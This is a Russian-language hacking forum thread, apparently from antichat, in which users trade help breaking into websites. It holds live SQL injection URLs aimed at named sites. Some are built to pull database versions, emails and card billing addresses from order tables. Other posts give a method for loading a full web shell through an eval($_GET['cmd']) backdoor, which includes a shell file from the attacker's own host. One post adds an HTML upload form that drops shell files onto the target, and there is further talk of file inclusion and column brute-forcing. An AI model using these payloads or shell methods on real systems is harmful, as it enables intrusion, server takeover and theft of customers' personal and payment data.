http://fitnesslife.com.ua/index.php?id=7647&show=4nalbum&do=showgall&gid=13078+union+select+1,2,3,4,@@version,6,7,8,9--+ Скобки не используй и крути
скажите как залить полноценный шелл на сервер имея на нем пхп с этим кодом: PHP: <?php eval($_GET["cmd"]); ?> какой запрос надо составить?
Заливаешь свой шелл в формате .txt куда угодно, затем выполняешь script.php?cmd=include("http://yoursite.com/shell.txt"); Затем через шелл льешь его в нужную папку на целевой сайт.
Создаешь у себя на компе файл lypapam.html PHP: <form enctype=multipart/form-data method=post action="http://lala/shell.php?cmd=$f=$_FILES[x];copy($f[tmp_name],$f[name]);"><input type=file name=x><input type=submit></form> ссылку до переменной http://lala/shell.php?cmd= - редактируешь под себя открываешь браузером lypapam.html, прикрепляешь шелл и клик на "отправить") шелл с таким же именем появится в папке с shell.php
ребят, подскажите пожалуйста.. тут копался и в одном сайте при переходе с одного страницы на другую - выдал ошибку: Code: Warning: include(../news.php) [function.include]: failed to open stream: No such file or directory in C:\Plesk\VHOSTS\[B]site.com[/B]\httpdocs\biography\index.php on line 107 как я понял - раскрытье путей.. как можно "эксплуатировать" эту ошибку ?
линк могу в личку кинуть, но хочется сам что то делать и понять.. сколько буду тут своими вопросами надоедать )))
shell_c0de Strilo4ka эта ошибка как бы в нижнем части появлается, в колонке вроде новостей.. мне кажется недоделанный скрипт. Вот даже когда захожу в титульную страницу - опять там эта ошибка вот так выглядет общий вид: Code: Warning: include(news.php) [function.include]: failed to open stream: No such file or directory in C:\Plesk\VHOSTS\site.com\httpdocs\index.php on line 107 Warning: include() [function.include]: Failed opening 'news.php' for inclusion (include_path='.;./includes;./pear') in C:\Plesk\VHOSTS\site.com\httpdocs\index.php on line 107 И как составить LFI ?
Что за бред? Если в качестве пользовательских параметров не передаются данные, используемые для инклуда, это не уязвимость, а лишь раскрытие путей.
Не смотрев на этот сайт, я могу сказать, что эта ошибка возникает потому, что файла news.php нету. И это всего лишь раскрытие... Так что не надо тут выдумывать, что это инклуд. И рассказывать о том, что ты знаешь о фильтрах, еще и MQ совать сюда. И еще, скажи - причем здесь /etc/shadow и /etc/passwd? Ты бы еще про мороженое тут написал. Этого не надо! Человек задал конкретный вопрос, если знаешь конкретный ответ - отвечай, нет - пройди мимо. Еще раз говорю, НЕ НАДО писать здесь о том, что ты знаешь, и строить из себя "умного". PS: Отличный ответ.
Ошибка при получении данных из таблицы Order http://site.com/cart.asp?cartItemQuantity6=0&cartItemId=76'+or+1=(select+top+1+orderCardBillAddress1+from+Order)-- При попытке получить данные их таблицы Order выдает ошибку: Microsoft OLE DB Provider for SQL Server error '80040e14' Incorrect syntax near the keyword 'Order'. /cart.asp, line 352 я так понимаю проблема в том что SQL воспринимает название таблицы как "order by", так как данные из таблиц с другим названием получаются без проблем. Как представить название таблицы Order чтобы ее SQL принял как имя таблицы? Пробовал переводить в HEX, но это не помогло. Заранее спасибо за помощь!
mailbrush А я думал все сторонники стеба и флуда. спасибо за понимание. таких людей побольше бы в ачате! Strilo4ka Мэн, не в обуду, но я не шаря в этом деле - могу сказать, что тут /etc/shadow и /etc/passwd вообше не причем, т.к. из путей видно, что сервер на WINDOWS. По этому речь о /etc/ идти не может. ------------- И как я понял - это НЕ уязвимость, а просто недоделка веб мастера. Сайт чуть ли не умерший. наверно туда очень редко заходят. сайт персональный (певец). Америкосы делали Вопрос пока в силе - можно ли (и каким образом) пользоватся этим ? Если логично дуать, то там стоит MSSQL хотя.. может и нет..
B1t.exe, кроме как раскрытие путей ты не чего не поимешь, т.к. там тупа нет подключаемого файла news.php Там типа вот этого PHP: <?php include "news.php"; ?> а не PHP: <?php include $_GET[page]; ?> т.е. на запрос повлиять нельзя. 3blK0B, читай http://forum.antichat.ru/thread30501.html
SeNaP хмм. так и понял, что это не уязвимость вот пробую такие комбинации: Code: http://www.site.com/index.php? it=1' or 1=(select db_name())-- http://www.site.com/index.php?it=1' http://www.site.com/index.php?it=1'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+IN FORMATION_SCHEMA.TABLES)-- все вкидывают на главную страницу и никаких ошибок. может там не MSSQL ? или все же хорошо защищен от иньекции ?
Если доступа к information_schema нету, выход - брут (перебор) столбцов. Вряд ли за тебя кто-то это сделает. Даже, если бы это была unix-подобная система, /etc/shadow не прочтешь, даже если юзер = root.
Почему может выходить такая ошибка когда я пытаюсь вывести данные запрос типа: http://xxx/latest.asp?ID=&offset=&prod_id=8896%20union+select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,email%20from%20orders%20-- ADODB.Command error '800a0d5d' Application uses a value of the wrong type for the current operation. /ProdDetail1.asp, line 20
